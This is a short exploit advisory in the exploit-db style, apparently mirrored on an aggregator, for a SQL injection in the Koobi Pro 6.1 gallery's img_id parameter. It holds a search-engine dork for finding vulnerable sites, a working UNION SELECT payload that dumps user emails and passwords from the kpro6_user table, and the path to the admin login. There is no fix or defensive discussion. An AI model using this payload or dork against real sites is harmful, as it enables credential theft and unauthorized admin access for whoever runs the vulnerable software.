Dream4 Koobi Pro 6.1 Gallery - 'img_id' SQL Injection

2009-12-2700:00:00

BILGE_KAGAN

www.exploit-db.com

AI Score

7.4

Confidence

Low

JSON

##########################################
#
# Koobi Pro v6.1 gallery (img_id)
#

##########################################
#
##AUTHOR : BILGE_KAGAN
#
####HOME : http://www.1923turk.biz
#
###########################################
#
# DORK 1 : allinurl: "index.php?p=gallerypic img_id"

###########################################
EXPLOiT:

index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+kpro6_user


aDM&#65533;N PANEL&#65533;:

admin/login.php